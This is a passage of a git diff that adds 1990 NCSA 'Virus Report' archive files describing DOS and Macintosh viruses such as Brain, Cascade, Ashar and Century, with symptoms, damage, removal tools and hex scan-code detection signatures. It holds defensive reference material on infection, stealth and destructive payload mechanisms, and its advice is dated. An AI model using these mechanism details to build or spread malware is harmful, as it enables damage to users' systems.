a bit at first, +more over time during the session. + +Derived from: Jerusalem B. + +Scan Code: "ANARKIA" replaces "sUMsDos" of the Jerusalem B. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa024.txt b/textfiles.com/virus/NCSA/ncsa024.txt new file mode 100644 index 00000000..592e865a --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa024.txt @@ -0,0 +1,43 @@ + Ŀ + VIRUS REPORT + Apple Virus + + +Date of Origin: Fall, 1989. + +Host Machine: Macintosh. + + The Apple virus is a "RESET" instruction followed by a "NOP" +instruction. The unusual sequence of statements (normally one would put +the "NOP" before the "RESET") makes it a surprisingly hard to detect and +disassemble. To propagate, the user must use Apple's Resource Editor +(ResEdit) to cut and paste this virus into every program that they want +it to infect. The virus seems to be more a tool for virus planters than +something that will be causing widespread damage directly. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa025.txt b/textfiles.com/virus/NCSA/ncsa025.txt new file mode 100644 index 00000000..12486b14 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa025.txt @@ -0,0 +1,44 @@ + Ŀ + VIRUS REPORT + April 1st-B + + +Host Machine: PC compatibles. + +Host Files: EXE files. + +Scan Code: 2E A3 17 00 BB 17 00 0E 1F B4 DE CD 21 B4 2A CD 21 81 FA 01 04 +74 22 81 F9 BC 07 75 06 E8 C5 04. + + An .EXE-infecting version of .COM which will display the +characteristic message on execution of any infected .EXE file on April +1st, with associated lockup. A similar lockup will occur 1 hour after +infection of memory on any day on which the default date 1-1-80 is used. +See sURiV. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa026.txt b/textfiles.com/virus/NCSA/ncsa026.txt new file mode 100644 index 00000000..02b895a3 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa026.txt @@ -0,0 +1,58 @@ + Ŀ + VIRUS REPORT + Ashar Virus + + +Synonyms: Shoe_Virus, UIUC Virus + +Host Machine: PC compatibles. + +Host Files: Infects floppy disk boot sector. Remains resident. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Resident. Corrupts or overwrites boot sector. + +Detected by: Scanv41+, F-Prot, IBM Scan. + +Removed by: CleanUp, MDisk, F-Prot, or the DOS SYS command. + +Derived from: Brain + +Scan Code: "ashar", found at offset 04A6 hex in the virus. + + Modifies the Brain virus message to read: + +VIRUS_SHOE RECORD, v9.0. Dedicated to the dynamic memories of millions +of virus who are no longer with us today + + This message is never displayed. + + Unlike the Brain, this virus can infect both floppies and hard disks. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa027.txt b/textfiles.com/virus/NCSA/ncsa027.txt new file mode 100644 index 00000000..c6a77b45 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa027.txt @@ -0,0 +1,56 @@ + Ŀ + VIRUS REPORT + Ashar-B Virus + + +Synonyms: Shoe_Virus-B + +Host Machine: PC compatibles. + +Host Files: Infects floppy disk boot sector. Cannot infect hard disks. +Remains resident. + +OnScreen Symptoms: none. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Resident. Corrupts or overwrites boot sector. + +Detected by: Scanv41+, F-Prot, IBM Scan. + +Removed by: CleanUp, MDisk, F-Prot, or the DOS SYS command. + +Derived from: Ashar + +Scan Code: "ashar", found at offset 04A6 hex in the virus. + + Modifies the Ashar virus message, changing "v9.0" to "v9.1" This +message is never displayed. Unlike the original Ashar virus, this +version can only infect floppies. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa028.txt b/textfiles.com/virus/NCSA/ncsa028.txt new file mode 100644 index 00000000..4507adb1 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa028.txt @@ -0,0 +1,53 @@ + Ŀ + VIRUS REPORT + Austrian Virus And Variants + + +Synonyms: 648 Virus. + +Date of Origin: Fall, 1988. + +Place of Origin: London, England. + +Host Machine: PC compatibles. + +Host Files: COM files. + +Increase in Size of Infected Files: 648 bytes. + +Scan Code: FC 8B F2 81 C6 0A 00 BF 00 01 B9 03 00 F3 A4 8B F2 B4 30 CD 21 +3C 00 75 03 E9 C7 01. + + This is a COM infector that increases the size of the infected file +by 648 bytes without changing date/time or attributes. Intentional +damage: one infected file in eight (at random) is changed in such a way +that the program will not run. No known unintentional damage. It is not +a memory resident virus. It infects the next uninfected COM file in the +current directory (similar to the original Friday 13th). + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa029.txt b/textfiles.com/virus/NCSA/ncsa029.txt new file mode 100644 index 00000000..0ee66d7c --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa029.txt @@ -0,0 +1,39 @@ + Ŀ + VIRUS REPORT + Austrian-B + + +Synonyms: 648-B. + +Host Machine: PC compatibles. + + This is similar to the original, but it causes infrequent errors in +the infected COM file so that the file will not execute. Approximately +one file in ten will be corrupted. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa030.txt b/textfiles.com/virus/NCSA/ncsa030.txt new file mode 100644 index 00000000..5b719329 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa030.txt @@ -0,0 +1,47 @@ + Ŀ + VIRUS REPORT + Black Hole + + +Synonyms: the Russian Virus. + +Host Machine: PC compatibles. + +Derived from: Jerusalem-C + + This virus is the Jerusalem-C that has odd text and additional code +that is never referenced. A new interrupt eight routine is added to the +non-referenced area and a number of interrupt 21 calls which appear +meaningless. The additional text includes "ANTIVIRUS". It appears that +this virus is a modified version of the Jerusalem-C/New Jerusalem. + + Note that because of the difference in EGA and CGA int 10 usage, +Jerusalem A has been observed with the blackhole effect noted on an EGA +screen. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa031.txt b/textfiles.com/virus/NCSA/ncsa031.txt new file mode 100644 index 00000000..ad0f4bbe --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa031.txt @@ -0,0 +1,134 @@ + Ŀ + VIRUS REPORT + Brain Virus + + +Synonyms: Pakistani, Pakistani Brain, Basit Virus. + +Date of Origin: January, 1986. + +Place of Origin: Lahore Pakistan. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects floppy disk boot sector. + +OnScreen Symptoms: None. Use DIR to find a volume label on an infected +floppy: "(c) Brain". Using a sector editor, you should be able to find +"(c) Brain" in sector 0, as well. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Resident, taking 3-7K of RAM. Corrupts or overwrites +boot sector. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, MDisk, F-Prot, or DOS SYS command. + +Derived from: This virus appears to be "an original." + +Scan Code: 8C C8 8E D8 8E D0 BC 00 F0 FB A0 06 7C A2 09 7C 8B 0E 07 7C 89 +0E 0A 7C E8 57 00. You can also search at 15EH for 8B 0E 07 7C 89 0E 0A 7C +E8 57. + + This virus originated in January, 1986, in Lahore Pakistan, but the +first noticeable infection problems did not surface until 1988. + + The Brain is unusual in that it includes the valid names, address and +phone numbers of the original perpetrators. It was written by two +brothers running a computer store in Lahore Pakistan. According to some +sources, Basit Farooq Alvi (one of the brothers) wrote the virus so that +it would infect machines running bootleg copies of a program he was +selling for physicians. The original Brain put a copyright notice in the +directory of floppy disks, but did no other damage to floppy disks, and +would not infect hard disks. + + This virus consists of a boot sector and three clusters (6 sectors) +marked as bad in the FAT. The first of these sectors contains the +original boot sector, and the rest contain the rest of the virus. It +only infects 360K floppies, and it occupies 7K of memory. + + The original Brain will infect a diskette whenever the diskette is +referenced. For example, a DIR command, executing a program from the +diskette, copying a file from or to the diskette or any other access will +cause the infection to occur. The virus stores the original boot sector, +and six extension sectors, containing the main body of the virus, in +available sectors which are then flagged as bad sectors. Diskettes have +3K of bad sectors (possibly more, if there are genuinely bad sectors, as +well.) + + The Brain causes no known intentional damage. However, it can slow +diskette access a bit, and may cause time-outs, which can make some +diskette drives unusable. + + Any attempts to examine the boot sector are likely to be intercepted +by the Brain when it is memory resident, redirecting the "view" to the +relocated boot sector. Thus, programs like the Norton Utilities will be +unable to "see" the virus. + + There are a number of unused character strings which can be used to +identify it: + + Offset 0010H: + + Welcome to the Dungeon + + (c) 1986 Basit & Amjad (pvt) Lt + +d. BRAIN COMPUTER SERVICES..730 NI + +ZAM BLOCK ALLAMA IQBAL TOWN LAHOR + +E-PAKISTAN..PHONE :430791,443248,280530. + + Beware of this VIRUS.....Contact us for vaccin + +ation............... $#@% + Offset 0202H: + + + +(c) 1986 Basit & Amjads (pvt) Ltd + + Offset 0355H: + + (c) 1986 Basit & Amjads (pvt) Ltd + + Offset 04A6H: + + (c) Brain $ + + Infected diskettes are noticeable by "@BRAIN" or "(c) BRAIN" +displayed in the volume label. Derivations can infect hard disks, and +some have had the "(c) Brain" label removed, to make detection more +difficult. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa032.txt b/textfiles.com/virus/NCSA/ncsa032.txt new file mode 100644 index 00000000..a299c725 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa032.txt @@ -0,0 +1,49 @@ + Ŀ + VIRUS REPORT + Brain-B + + +Synonyms: Brain-HD, the Hard Disk Brain, Houston Virus. + +Host Machine: PC compatibles. + +OnScreen Symptoms: none. + +Nature of Damage: Resident, taking 3-7K of RAM. Corrupts or overwrites +boot sector. + +Detected by: Scanv56+, F-Prot, IBM Scan. + +Removed by: CleanUp, MDisk, F-Prot, or DOS SYS command. + +Derived from: original Brain virus. + + This virus is identical in every respect to the original Brain, with +the single exception that it can infect the C drive. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa033.txt b/textfiles.com/virus/NCSA/ncsa033.txt new file mode 100644 index 00000000..44fcc968 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa033.txt @@ -0,0 +1,48 @@ + Ŀ + VIRUS REPORT + Brain-C + + +Host Machine: PC compatibles. + +OnScreen Symptoms: none. + +Nature of Damage: Resident, taking 3-7K of RAM. Corrupts or overwrites +boot sector. + +Detected by: Scanv56+, F-Prot, IBM Scan. + +Removed by: CleanUp, MDisk, F-Prot, or DOS SYS command. + +Derived from: Brain-B. + + This virus is the Brain-B that has the volume label code removed. The +volume label of infected diskettes does not change with this virus. This +virus is difficult to detect since it does nothing overt in the system. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa034.txt b/textfiles.com/virus/NCSA/ncsa034.txt new file mode 100644 index 00000000..8b179e42 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa034.txt @@ -0,0 +1,111 @@ + Ŀ + VIRUS REPORT + Cascade Virus + + +Synonyms: 1701, Falling Letters, Falling Tears, Fall virus, Autumn +Leaves. + +Date of Origin: late 1987. + +Place of Origin: Switzerland? + +Host Machine: The 1701 version will infect both true IBM PC's and PC +compatibles; the 1704 version will only affect PC compatibles. This is +the only difference between the two versions. + +Host Files: Remains resident. Infects COM files. Uses self-encryption. + +OnScreen Symptoms: If the system month is between September and +December, and the system year is either 1980 or 1988, and the monitor is +either CGA or VGA, the cascade display will be activated at random +intervals. + +Increase in Size of Infected Files: 1701 or 1704 bytes (two different +versions). + +Nature of Damage: Affects system run-time operation. Corrupts program or +overlay files. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: M-1704, CleanUp, or F-Prot. You may also follow the +instructions for removing the Jerusalem virus. + +Derived from: A NumLock utility Trojan horse. + +Scan Code: Uses self-encryption. FA 8B EC E8 00 00 5B 81 EB 31 01 2E F6 +87 2A 01 01 74 0F 8D B7 4D 01 BC 82 06 31 34 31 24 46 4C 75 F8. You can +also search at offset 01BH for 31 34 31 24 46 4C 75 F8. + + This virus was adapted from a Trojan utility which was claimed to +turn of the Num Lock light and mode. The Trojan caused characters on CGA +screens to "fall" to the bottom of the screen. In late 1987 this Trojan +was turned into a memory resident COM virus, and reported by Rudolf +Rindler of Switzerland. + + Two version of the virus exist. + +* The 1701 version increases the size of COM files by 1,701 bytes, and + infect both machines containing an IBM copyright notice in the ROM + and clones. + +* The 1704 version increases the size of COM files by 1,704 bytes, and + infects only clones. + + The virus occurs attached to the end of a COM file. The first three +bytes of the program are stored in the virus, and replaced by a branch to +the beginning of the virus. It becomes memory-resident when the first +infected program is run, and it will then infect every COM file run (even +if the file has an EXE extension). + + The virus is unique in several ways: + +* The virus is encrypted (apart from the first 35 bytes) using an + algorithm that includes the length of the host program, so every + sample looks different. + +* The mechanics of its activation are complex, being based on + randomizations, machine types, monitor type, presence or absence of + clock cards, and time of year. The virus activates on any machine + with a CGA or VGA monitor, in the months of September, October, + November or December, in the year 1980 or 1988 (systems without clock + cards will often have a date set to 1980). + +* Occasionally, 1701 triggers a "hailstorm". The characters on the + screen behave as if the were pinned to the screen, and someone is + removing the pins one at a time <197> it looks a bit like a hailstorm, + and has appropriate sound effects. In fact, it is a purely + audio-visual effect - nothing is happening to your data. But over + -reaction at this point -- turning the machine off -- may result in + lost clusters and file damage. + + To remove the virus, either run M-1704 or follow the instructions +offered for the Jerusalem virus. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa035.txt b/textfiles.com/virus/NCSA/ncsa035.txt new file mode 100644 index 00000000..9a358f2a --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa035.txt @@ -0,0 +1,76 @@ + Ŀ + VIRUS REPORT + Cascade-B + + +Synonyms: 1704-B, 1701-B, Blackjack virus + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM files. + +OnScreen Symptoms: There is no cascade display on the screen for this +version. The system will reboot at random intervals after activation. + +Increase in Size of Infected Files: 1701 bytes (will infect both PCs and +compatibles) or 1704 bytes (will infect only PC compatibles). + +Nature of Damage: Affects system run-time operation. Corrupts program or +overlay files. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: M-1704, M-1704C, CleanUp, or F-Prot. You may also follow the +instructions for removing the Jerusalem virus. + +Derived from: Cascade. + +Scan Code: Uses self-encryption. FA 8B EC E8 00 00 5B 81 EB 31 01 2E F6 +87 2A 01 01 74 0F 8D B7 4D 01 BC 85 06 31 34 31 24 46 4C 75 F8. You can +also search at offset 01BH for 31 34 31 24 46 4C 77 F8. + + This virus is identical to the Cascade except for these two changes: + +* it activates in the fall of any year; + +* the cascading display has been replaced with a system re-boot when + the virus activates. + + The activation uses the same interrupt 8 randomization algorithm, so +the reboot will occur at a random time interval after executing an +infected program on or after the activation date. + + This virus has the ability to infect a file more than once. Cleanup +works well at removing the virus, even from files infected multiple +times (Cleanup will have to be run the same number of times that the file +is infected). Be warned though, if you find a file has been infected more +than once, remove the virus and delete the file, as files infected more +than once will hang your computer. Files infected only once by this virus +seem to run OK after removing the virus. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa036.txt b/textfiles.com/virus/NCSA/ncsa036.txt new file mode 100644 index 00000000..72d3612c --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa036.txt @@ -0,0 +1,49 @@ + Ŀ + VIRUS REPORT + Cascade-C + + +Synonyms: 1704-C + +Host Machine: PC compatibles. True IBM PCs won't be infected. + +Host Files: COM files. + +Increase in Size of Infected Files: 1704 bytes. + +Removed by: M-1704C. + +Derived from: Cascade-B + +Scan Code: F6 87 2A 01 01 74 0F 8D B7 4D 01 BC or F6 87 2A 01 01 74 0F 8D +B7 4D 01 BC 85 06 31 34 31 24 46 4C 77 F8. + + This virus is the same as the Cascade-B/1704-B, except the +activation date has been changed to occur in December of any year. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa037.txt b/textfiles.com/virus/NCSA/ncsa037.txt new file mode 100644 index 00000000..80926146 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa037.txt @@ -0,0 +1,42 @@ + Ŀ + VIRUS REPORT + Cascade-D + + +Synonyms: 1704-D + +Host Machine: PC compatibles. + +Derived from: Cascade + +Scan Code: F6 87 2A 01 01 74 0F 8D B7 4D 01 BC. + + This virus is the same as the Cascade/1704, except that it is able to +infect machines with an IBM copyright notice in the ROM. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa038.txt b/textfiles.com/virus/NCSA/ncsa038.txt new file mode 100644 index 00000000..9990c8c9 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa038.txt @@ -0,0 +1,41 @@ + Ŀ + VIRUS REPORT + Century Virus + + +Synonyms: the Oregon Virus. + +Host Machine: PC compatibles. + + This is similar to the Jerusalem-C except the activation date is +January 1, 2000. When the virus activates, it erases both FATs on all +connected drives and then begins writing zeroes to every sector on every +attached device. If allowed to continue to completion, it displays the +message - " Welcome to the 21st Century". + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa039.txt b/textfiles.com/virus/NCSA/ncsa039.txt new file mode 100644 index 00000000..df35fa1e --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa039.txt @@ -0,0 +1,40 @@ + Ŀ + VIRUS REPORT + Century-B + + +Host Machine: PC compatibles. + +Derived from: Century virus. + + This virus is similar to the original Century virus with the +following exception: It waits for BACKUP.COM to be executed and then +garbles all program writes. After BACKUP terminates, the output +functions return to normal. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa040.txt b/textfiles.com/virus/NCSA/ncsa040.txt new file mode 100644 index 00000000..51673287 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa040.txt @@ -0,0 +1,57 @@ + Ŀ + VIRUS REPORT + Chaos + + +Date of Origin: First reported by James Berry in December, 1989. + +Place of Origin: Possibly Kent, England + +Host Machine: PC compatibles. + +Host Files: hard disk and floppy disk boot sectors. + +OnScreen Symptoms: None. Infected boot sectors will contain these +messages: "Welcome to the New Dungeon", "Chaos", and "Letz be cool +guys". + +Increase in Size of Infected Files: n/a + +Nature of Damage: Remains resident. Corrupts or overwrites boot sector, +affects system run-time operation, corrupts data files, formats or +erases all/part of disk. + 